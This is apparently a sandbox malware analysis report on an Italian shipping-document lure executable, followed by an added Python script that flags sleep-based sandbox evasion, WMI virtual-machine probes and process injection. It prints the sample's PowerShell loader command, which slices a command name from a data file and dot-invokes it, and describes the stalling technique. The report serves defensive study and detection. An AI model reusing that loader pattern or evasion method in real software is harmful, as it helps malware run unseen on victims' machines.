            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | API/Special instruction interceptor: Address: 4B055C7
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Memory allocated: 2EF0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Memory allocated: 24490000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Memory allocated: 24340000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 600000, 599890, 599779, 599656, 599545, 599435, 599312, 599202, 599093, 598984, 598869, 598761, 598640, 598531, 598419, 598297, 598185, 598075, 597953, 597843, 597733, 597622, 597500, 597390, 597265, 597156, 597044, 596922, 596797, 596687, 596547, 596437, 596315, 596187, 596076, 595953, 595843, 595734, 595624, 595500, 595390, 595270, 595154, 595042, 594937, 594828, 594718, 594600, 594484, 594375 (50 consecutive delays)
Note: delay times are milliseconds. 922337203685477 is 2^63 / 10^4, the largest relative interval NtDelayExecution can express, and is how an INFINITE wait is recorded. The 50-value run starts at 600000 ms (10 minutes) and shrinks by roughly 110-125 ms per call (mean 115 ms): the pattern of a loop that re-sleeps for "deadline minus now" each time the sandbox cuts a long sleep short. The step is the real wall-clock time one iteration took, so the sandbox shortened each sleep without advancing the clock the loop reads, and the loop keeps re-arming instead of proceeding.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7439, 2243, 6104, 3699
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Window / User API: threadDelayed 3387, 6446
Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl39F4.tmp\nsExec.dll
Note: nsExec.dll written to an ns????.tmp directory under %TEMP% is the NSIS installer's nsExec plugin unpacked into $PLUGINSDIR, so the first-stage executable on the image is an NSIS-built installer; the plugin was extracted but never loaded in this run.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7596 | Thread sleep count: 7439 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584 | Thread sleep count: 2243 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7644 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7936 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396 | Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7432 | Thread sleep count: 3387 > 30
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7432 | Thread sleep count: 6446 > 30
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396 | Thread sleep time (each >= -30000s): -600000s, -599890s, -599779s, -599656s, -599545s, -599435s, -599312s, -599202s, -599093s, -598984s, -598869s, -598761s, -598640s, -598531s, -598419s, -598297s, -598185s, -598075s, -597953s, -597843s, -597733s, -597622s, -597500s, -597390s, -597265s, -597156s, -597044s, -596922s, -596797s, -596687s, -596547s, -596437s, -596315s, -596187s, -596076s, -595953s, -595843s, -595734s, -595624s, -595500s, -595390s, -595270s, -595154s, -595042s, -594937s, -594828s, -594718s, -594600s, -594484s, -594375s (50 consecutive calls on one thread)
Note: the "s" suffix is the report's label; the values are milliseconds (the -30000 threshold is 30 s, -600000 is 10 min) and negative because NtDelayExecution takes relative intervals as negative numbers. A single call cannot request more than 922337203685477 ms, and -7378697629483816, -4611686018427385 and -23980767295822402 are exactly 8, 5 and 26 times that value: each of those rows is the thread's accumulated requested delay, made up only of INFINITE waits. Threads 7596, 7584 and 7432 instead issued thousands of short sleeps, the other half of the same stalling strategy.
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599779Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599545Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599435Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599312Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599202Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599093Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598869Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598761Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598640Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598419Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598297Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598185Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598075Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597953Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597843Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597733Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597622Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597500Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597390Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597044Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596922Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596797Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596687Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596547Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596315Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596076Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595624Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595500Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595390Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595270Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595154Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595042Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594937Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594828Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594718Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594600Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594484Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594375Jump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\userJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: wabmig.exe, 0000000B.00000002.2999110092.0000000008877000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPm
            Source: wabmig.exe, 0000000B.00000002.2999110092.00000000088D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Documenti di spedizione 0009333000459595995.exe, 00000005.00000002.1793128293.0000000000840000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 4460000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 2EFFBE4
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)
Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
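The evasion evidence earlier in this report (wabmig.exe sleeping for roughly 600000 ms and counting down in steps of about 110 ms, the 922337203685477 ms wait, the Win32_BaseBoard and Win32_Processor WMI probes) and the loader chain in the lines just above (PowerShell reads a data file, slices a three-character command name out of it with SubString, dot-invokes that name on the file contents, then creates wabmig.exe and writes into its memory) are what an analyst wants pulled out of a report like this automatically. The script below is an added example written for this page, not code from Joe Sandbox or from the sample. It assumes the lines have been normalised to a "Source: <process> | <event>" layout, treats the sleep and delay values as milliseconds (the "s" suffix the report prints does not fit a 30000 threshold that the signature list describes as 30 seconds), recognises 922337203685477 as Int64.MaxValue ticks divided by 10000, i.e. .NET TimeSpan.MaxValue in milliseconds, and uses an analyst-chosen 3 minute threshold and WMI class list. The sample lines are constructed for the example and modelled on the entries in this report. The cmd.exe to PowerShell Mount-DiskImage line reading C:\Windows\path.txt is most likely the analysis harness mounting the submitted .img rather than the sample's own behaviour (an assumption; the report does not say), so the script reports it separately rather than folding it into the sample's loader stage. The three-character string at offset 70317 of Dyssen.Mod is not shown in the report, so the detection keys on the SubString-then-dot-invoke shape rather than on any particular alias.

```python
"""Triage of sandbox behaviour lines (added example; not code from the Joe Sandbox report)."""
import re
from dataclasses import dataclass, field

# Analyst-chosen thresholds and sentinels (assumptions, not values taken from the report).
LONG_SLEEP_MS = 180_000                 # 3 minutes, the "long sleep" bar used by the signature list
TIMESPAN_MAX_MS = 922_337_203_685_477   # Int64.MaxValue ticks / 10_000: .NET TimeSpan.MaxValue in ms
VM_PROBE_CLASSES = {"Win32_BaseBoard", "Win32_Processor", "Win32_NetworkAdapter",
                    "Win32_ComputerSystem", "Win32_BIOS"}

LINE_RE = re.compile(r"^Source:\s*(?P<src>.+?)\s*\|\s*(?P<evt>.+)$")
SLEEP_RE = re.compile(r"(?:sleep time|delay time):\s*-?(\d+)")
WMI_CLASS_RE = re.compile(r"\b(Win32_\w+)")
CHILD_RE = re.compile(r"^Process created:\s*(?P<child>.+?\.exe)", re.I)
# GuLoader-style launcher seen in this report: read a blob with Get-Content, slice a
# three-character command name out of it with SubString, then dot-invoke it on the blob.
PS_SLICE_RE = re.compile(r"SubString\(\d+,\s*3\)", re.I)
PS_DOTINVOKE_RE = re.compile(r"\.\$\w+\(\$\w+\)")
MOUNT_RE = re.compile(r"Mount-DiskImage", re.I)


@dataclass
class Findings:
    long_sleeps: list = field(default_factory=list)        # (process, ms, label)
    vm_probes: list = field(default_factory=list)          # (process, WMI class)
    loader_cmds: list = field(default_factory=list)        # (parent, reason)
    injections: list = field(default_factory=list)         # (writer, target)
    hollow_candidates: list = field(default_factory=list)  # (writer, target) where writer also created target


def triage(lines):
    """Parse 'Source: <process> | <event>' lines and collect evasion and loader indicators."""
    f = Findings()
    created = set()  # (parent, child) pairs, case-folded, from "Process created" events
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        src, evt = m.group("src"), m.group("evt")
        s = SLEEP_RE.search(evt)
        if s:
            ms = int(s.group(1))  # values are milliseconds despite the "s" suffix the report prints
            if ms == TIMESPAN_MAX_MS:
                f.long_sleeps.append((src, ms, "infinite wait (TimeSpan.MaxValue)"))
            elif ms >= LONG_SLEEP_MS:
                f.long_sleeps.append((src, ms, "long sleep"))
        if evt.startswith("WMI Queries:"):
            for cls in WMI_CLASS_RE.findall(evt):
                if cls in VM_PROBE_CLASSES:
                    f.vm_probes.append((src, cls))
        c = CHILD_RE.match(evt)
        if c:
            created.add((src.casefold(), c.group("child").casefold()))
            reasons = []
            if PS_SLICE_RE.search(evt) and PS_DOTINVOKE_RE.search(evt):
                reasons.append("command name sliced from a data file and dot-invoked")
            if MOUNT_RE.search(evt):
                reasons.append("Mount-DiskImage from command-line PowerShell (harness or lure stage)")
            if reasons:
                f.loader_cmds.append((src, "; ".join(reasons)))
        if evt.startswith("Memory written:"):
            target = evt[len("Memory written:"):].split(" base:")[0].strip()
            f.injections.append((src, target))
    # A process that creates a child and then writes into it is the hollowing / injection shape.
    for writer, target in dict.fromkeys(f.injections):
        if (writer.casefold(), target.casefold()) in created:
            f.hollow_candidates.append((writer, target))
    return f


def summarize(f):
    """Counts per indicator class, handy for a one-line verdict."""
    return {"long_sleeps": len(f.long_sleeps), "vm_probes": len(f.vm_probes),
            "loader_cmds": len(f.loader_cmds), "injections": len(f.injections),
            "hollow_candidates": len(f.hollow_candidates)}


# Constructed sample in the normalised layout, modelled on entries from this report.
SAMPLE = [
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396 | Thread sleep time: -596437s >= -30000s",
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 922337203685477",
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 1500",
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard",
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor",
    r"Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)",
    r'''Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)"''',
    r'Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"',
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 4460000",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 2EFFBE4",
]

if __name__ == "__main__":
    found = triage(SAMPLE)
    print(summarize(found))
    for item in found.long_sleeps + found.vm_probes + found.loader_cmds + found.hollow_candidates:
        print(item)
```

The 1500 ms delay in the sample is deliberately below the threshold and is not reported; the two Memory written entries collapse to a single hollowing candidate because the writer is also the creator of the target, which is exactly the powershell.exe to wabmig.exe relationship recorded above.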
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (17 identical entries collapsed)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (10 identical entries collapsed)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (3 identical entries collapsed)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation (3 identical entries collapsed)
